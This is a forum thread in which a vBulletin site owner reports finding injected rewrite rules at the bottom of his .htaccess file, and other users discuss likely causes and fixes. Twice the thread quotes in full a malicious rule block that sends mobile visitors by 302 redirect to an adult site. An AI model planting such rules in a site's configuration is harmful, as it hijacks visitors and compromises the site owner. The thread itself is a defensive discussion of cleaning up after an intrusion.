htaccess hacked :(

[viper357]

Was doing some SEO work today and noticed this at the bottom of my htaccess file

Code:

RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} "android|blackberry|ipad|iphone|ipod|iemobile|opera mobile|palmos|webos|2.0\ MMP|240x320|400X240|AvantGo|BlackBerry|Blazer|Cellphone|Danger|DoCoMo|Elaine/3.0|EudoraWeb|Googlebot-Mobile|hiptop|IEMobile|KYOCERA/WX310K|LG/U990|MIDP-2.|MMEF20|MOT-V|NetFront|Newt|Nintendo\ Wii|Nitro|Nokia|Opera\ Mini|Palm|PlayStation\ Portable|portalmmm|Proxinet|ProxiNet|SHARP-TQ-GX10|SHG-i900|Small|SonyEricsson|Symbian\ OS|SymbianOS|TS21i-10|UP.Browser|UP.Link|webOS|Windows\ CE|WinWAP|YahooSeeker/M1A1-R2D2|iPhone|iPod|Android|BlackBerry9530|LG-TU915\ Obigo|LGE\ VX|webOS|Nokia5800|w3c\ |w3c-|acs-|alav|alca|amoi|audi|avan|benq|bird|blac|blaz|brew|cell|cldc|cmd-|dang|doco|eric|hipt|htc_|inno|ipaq|ipod|jigs|kddi|keji|leno|lg-c|lg-d|lg-g|lge-|lg/u|maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|nec-|newt|noki|palm|pana|pant|phil|play|port|prox|qwap|sage|sams|sany|sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo|teli|tim-|tosh|tsm-|upg1|upsi|vk-v|voda|wap-|wapa|wapi|wapp|wapr|webc|winw|winw|xda\ |xda-" [NC]
RewriteRule ^(.*)$ http://m.freesexvideosworld.org%{REQUEST_URI} [L,R=302]

So I guess my htaccess file has been hacked, easy enough to fix I suppose by just deleting that, but what can I do to prevent it from happening again? How do I protect my htaccess file from being tampered with?

[ForceHSS]

do you have a backup of what it used to be

[ozzy47]

Looks like it to me, seems like if you go to the site with a mobile devise, it redirects you to a sex site.

Only way that was added to your htaccess is someone gained FTP access or the login info for your server/cpanel.

[viper357]

Quote:

Originally Posted by ForceHSS

do you have a backup of what it used to be

The rest of the file was fine, this code was just added to the bottom of it.

Quote:

Originally Posted by ozzy47

Looks like it to me, seems like if you go to the site with a mobile devise, it redirects you to a sex site.

Only way that was added to your htaccess is someone gained FTP access or the login info for your server/cpanel.

Thanks, I'll change the FTP and cpanel passwords.

--------------- Added [DATE]1393507956[/DATE] at [TIME]1393507956[/TIME] ---------------

Quote:

Originally Posted by ozzy47

Only way that was added to your htaccess is someone gained FTP access or the login info for your server/cpanel.

Thinking about that now, if they've gained access to my htaccess file then they would have probably had access to my whole server/account. Could they have added this code to any other files?

[ozzy47]

Possibly, best thing to do is download a fresh copy of your vB, same version you are running, and upload the files to the server. You should do it for all mods installed as well.

[RichieBoy67]

File permissions could have also been wrong giving anyone access to it. Check your file permissions and see if anything else has been impacted. Check out your webmastertools account as well under the security tab and see if it lists anything.

Most directories should be chmod 755 except for those that need write access, most files should be set at chmod 644 depending on your server.

[TheLastSuperman]

Ahh I ran into this the other day as well when working on a site and it had to vulnerabilities... it still had vBSEO installed and had the /install/ folder on the server so be sure to switch vBSEO to DBSEO OR Remove it entirely and rewrite the urls AND/OR delete the install folder if present on your server.

Code from the .htaccess I ran into:

PHP Code:

RewriteCond %{HTTP_USER_AGENT} "android|blackberry|ipad|iphone|ipod|iemobile|opera mobile|palmos|webos|2.0\ MMP|240x320|400X240|AvantGo|BlackBerry|Blazer|Cellphone|Danger|DoCoMo|Elaine/3.0|EudoraWeb|Googlebot-Mobile|hiptop|IEMobile|KYOCERA/WX310K|LG/U990|MIDP-2.|MMEF20|MOT-V|NetFront|Newt|Nintendo\ Wii|Nitro|Nokia|Opera\ Mini|Palm|PlayStation\ Portable|portalmmm|Proxinet|ProxiNet|SHARP-TQ-GX10|SHG-i900|Small|SonyEricsson|Symbian\ OS|SymbianOS|TS21i-10|UP.Browser|UP.Link|webOS|Windows\ CE|WinWAP|YahooSeeker/M1A1-R2D2|iPhone|iPod|Android|BlackBerry9530|LG-TU915\ Obigo|LGE\ VX|webOS|Nokia5800|w3c\ |w3c-|acs-|alav|alca|amoi|audi|avan|benq|bird|blac|blaz|brew|cell|cldc|cmd-|dang|doco|eric|hipt|htc_|inno|ipaq|ipod|jigs|kddi|keji|leno|lg-c|lg-d|lg-g|lge-|lg/u|maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|nec-|newt|noki|palm|pana|pant|phil|play|port|prox|qwap|sage|sams|sany|sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo|teli|tim-|tosh|tsm-|upg1|upsi|vk-v|voda|wap-|wapa|wapi|wapp|wapr|webc|winw|winw|xda\ |xda-" [NC]
RewriteRule ^(.*)$ http://m.freesexvideosworld.org%{REQUEST_URI} [L,R=302] 


[viper357]

Thanks everyone.

I've never had vbseo installed (just the sitemap generator) and the /install folder was deleted years ago.

[TheLastSuperman]

Quote:

Originally Posted by viper357

Thanks everyone.

I've never had vbseo installed (just the sitemap generator) and the /install folder was deleted years ago.

Is your forum updated to 4.2.1/4.2.2 OR if a slightly older version is it patched? Make sure it's patched at least, if not they may have gotten in that way.

[viper357]

I'm on 3.8.5

I know there's updates to vb3 but I've made loads of template edits so an upgrade means losing all of those, I need to find time to update.